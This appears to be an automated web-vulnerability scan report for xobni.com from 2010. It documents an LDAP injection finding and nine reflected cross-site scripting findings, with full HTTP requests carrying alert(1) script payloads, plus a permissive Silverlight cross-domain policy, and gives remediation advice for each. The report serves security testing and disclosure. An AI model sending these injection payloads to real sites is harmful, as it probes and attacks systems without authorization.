xobni.com, Site Report

The source parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /errors/404.php?report_my_error=1&source=*)(sn=*&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:11:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7799

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/enterprise" id="header_enterprise" class="enablepulldown">Unternehmen</a></li><li class=""><a href="/learnmore/video" id="header_videos" class="">Videos</a></li><li class=""><a href="/press/testimonials" id="header_testimonials" class="">Testimonials</a></li><li class=""><a href="/developer" id="header_developers" class="">Entwicklern</a></li></ul>
                   <div id="auxheader">
                       <div id="auxheaderinner">

                           <a href='/account/'>Anmelden</a>
                           <a id="header_partners" href="/partners">Partner</a>
                           <a href="/about">Das Unternehmen</a>
                           <a href="/support">Support</a>
                           <a href="/blog">Blog</a>
                       </div>
                   </div>
               <div class="pulldownmenu preload"></div>
               </div>
            </div>






<div id="main">
   <div id="steelcontent" class="nosidebar">

       <div id="leafboard">
           <h1>Ooops! Page Not Found </h1>
           <h2><b>Thanks for letting us know!</b><br/>Sorry about that. Care to head to our <a href="http://www.xobni.com">home page</a>?</h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></l
...[SNIP]...

Request 2

GET /errors/404.php?report_my_error=1&source=*)!(sn=*&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:11:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7766

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/enterprise" id="header_enterprise" class="enablepulldown">Enterprise</a></li><li class=""><a href="/learnmore/video" id="header_videos" class="">Videos</a></li><li class=""><a href="/press/testimonials" id="header_testimonials" class="">Testimonials</a></li><li class=""><a href="/developer" id="header_developers" class="">Developers</a></li></ul>
                   <div id="auxheader">
                       <div id="auxheaderinner">

                           <a href='/account/'>Log In</a>
                           <a id="header_partners" href="/partners">Partners</a>
                           <a href="/about">Company Info</a>
                           <a href="/support">Support</a>
                           <a href="/blog">Blog</a>
                       </div>
                   </div>
               <div class="pulldownmenu preload"></div>
               </div>
            </div>






<div id="main">
   <div id="steelcontent" class="nosidebar">

       <div id="leafboard">
           <h1>Ooops! Page Not Found </h1>
           <h2><b>Thanks for letting us know!</b><br/>Sorry about that. Care to head to our <a href="http://www.xobni.com">home page</a>?</h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Company Info</h3>
       <ul>
           <li><a href="/about">About</a></li>
           <li><a href="/press">News Room</a></li>
           <li><a href="/about/jobs">Jobs</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner with Xobni</h3>
       <ul>
           <li><a href="/partners">Overview</a></li>
           <li><a href="/partners/partners_content">Content Partners</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Legal</h3>
       <ul>
           <li><a href="/legal/trademarks">Trademarks</a></li>
           <li><a href="/legal/privacy">Privacy Policy</a></li>
           <li><a hr
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 9 instances of this issue:

/account/ [rd parameter]
/account/gadget_welcome [name of an arbitrarily supplied request parameter]
/account/set_extension [name of an arbitrarily supplied request parameter]
/fr-fr/account/gadget_welcome [name of an arbitrarily supplied request parameter]
/download [trigger_id cookie]
/download [trigger_id cookie]
/download/ [trigger_id cookie]
/download/12341 [trigger_id cookie]
/download/latest [trigger_id cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.xobni.com/account/ [rd parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/

Issue detail

The value of the rd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c"><script>alert(1)</script>742637472ef was submitted in the rd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account/?rd=%2Fsupport%2F%3Fcontact%3Dy13c9c"><script>alert(1)</script>742637472ef HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/support/?contact=y13c9c"><script>alert(1)</script>742637472ef">
...[SNIP]...

2.2. http://www.xobni.com/account/gadget_welcome [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/gadget_welcome

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fac7"><script>alert(1)</script>f80ea45cd5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/gadget_welcome?9fac7"><script>alert(1)</script>f80ea45cd5e=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

2.3. http://www.xobni.com/account/set_extension [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/set_extension

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1934"><script>alert(1)</script>7877214264b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/set_extension?f1934"><script>alert(1)</script>7877214264b=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/account/set_extension?f1934"><script>alert(1)</script>7877214264b=1">
...[SNIP]...

2.4. http://www.xobni.com/fr-fr/account/gadget_welcome [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/account/gadget_welcome

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e945"><script>alert(1)</script>facb1ebd9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr-fr/account/gadget_welcome?5e945"><script>alert(1)</script>facb1ebd9ec=1 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/developer/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:19:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Your Xobni Accoun
...[SNIP]...
<input type="hidden" name="rd" value="/fr-fr/account/gadget_welcome?5e945"><script>alert(1)</script>facb1ebd9ec=1">
...[SNIP]...

2.5. http://www.xobni.com/download [trigger_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The value of the trigger_id cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 543ee"%3balert(1)//aaae5e31f92 was submitted in the trigger_id cookie. This input was echoed as 543ee";alert(1)//aaae5e31f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362543ee"%3balert(1)//aaae5e31f92; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362543ee%22%3Balert%281%29%2F%2Faaae5e31f92; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...

...[SNIP]...

2.6. http://www.xobni.com/download [trigger_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3c20"><script>alert(1)</script>4232c10c30f was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362c3c20"><script>alert(1)</script>4232c10c30f; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362c3c20%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4232c10c30f; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9780

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=10432362c3c20"><script>alert(1)</script>4232c10c30f" class="downloadcta">
...[SNIP]...

2.7. http://www.xobni.com/download/ [trigger_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6bf6"><script>alert(1)</script>466eba28b was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362f6bf6"><script>alert(1)</script>466eba28b; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362f6bf6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E466eba28b; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9888

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=10432362f6bf6"><script>alert(1)</script>466eba28b" class="downloadcta">
...[SNIP]...

2.8. http://www.xobni.com/download/12341 [trigger_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/12341

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe22"><script>alert(1)</script>069ab2c9ffb was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/support/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362bfe22"><script>alert(1)</script>069ab2c9ffb; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362bfe22%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E069ab2c9ffb; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12341?t=10432362bfe22"><script>alert(1)</script>069ab2c9ffb" class="downloadcta">
...[SNIP]...

2.9. http://www.xobni.com/download/latest [trigger_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/latest

Issue detail

The value of the trigger_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b652"><script>alert(1)</script>8107f0e982d was submitted in the trigger_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/support/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=104323628b652"><script>alert(1)</script>8107f0e982d; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:09:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=104323628b652%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8107f0e982d; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...
<a href="http://www.xobni.com/push/12772?t=104323628b652"><script>alert(1)</script>8107f0e982d" class="downloadcta">
...[SNIP]...

3. Silverlight cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:42 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 04:01:13 GMT
ETag: "3b03be-158-486fea01e5440"
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

4. Session token in URL previous next

